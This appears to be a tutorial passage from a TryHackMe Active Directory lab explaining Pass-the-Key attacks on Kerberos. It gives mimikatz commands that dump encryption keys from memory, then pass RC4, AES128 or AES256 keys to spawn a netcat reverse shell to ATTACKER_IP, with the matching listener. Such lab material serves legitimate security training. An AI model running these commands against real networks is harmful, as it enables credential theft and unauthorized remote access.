Here is the reorganized information on Pass-the-Key:

**Pass-the-Key (PtK):**

Pass-the-Key is an attack similar to Pass-the-Hash (PtH) but specifically targeting Kerberos networks. When a user requests a Ticket Granting Ticket (TGT), they send a timestamp encrypted with an encryption key derived from their password. The algorithm used to derive this key can be DES, RC4, AES128, or AES256, depending on the Windows version and Kerberos configuration.

To perform a Pass-the-Key attack, we can obtain the Kerberos encryption keys from memory using mimikatz with the following commands:

1. Use mimikatz to debug the privilege and extract the Kerberos encryption keys:
   ```
   mimikatz # privilege::debug
   mimikatz # sekurlsa::ekeys
   ```

2. Depending on the available keys, use the appropriate command in mimikatz to get a reverse shell via Pass-the-Key. Replace `ATTACKER_IP` with the IP address of your machine:
   - If we have the RC4 hash:
     ```
     mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
     ```

   - If we have the AES128 hash:
     ```
     mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
     ```

   - If we have the AES256 hash:
     ```
     mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
     ```

   - Note: When using RC4, the key will be equal to the NTLM hash of a user. This variant is known as Overpass-the-Hash (OPtH).

3. To receive the reverse shell, run a reverse listener on your AttackBox using the following command:
   ```
   user@AttackBox$ nc -lvp 5556
   ```

   - Any command executed from this shell will use the injected credentials via mimikatz.

This attack allows an attacker to gain unauthorized access to services in a Kerberos network by leveraging stolen or extracted Kerberos encryption keys.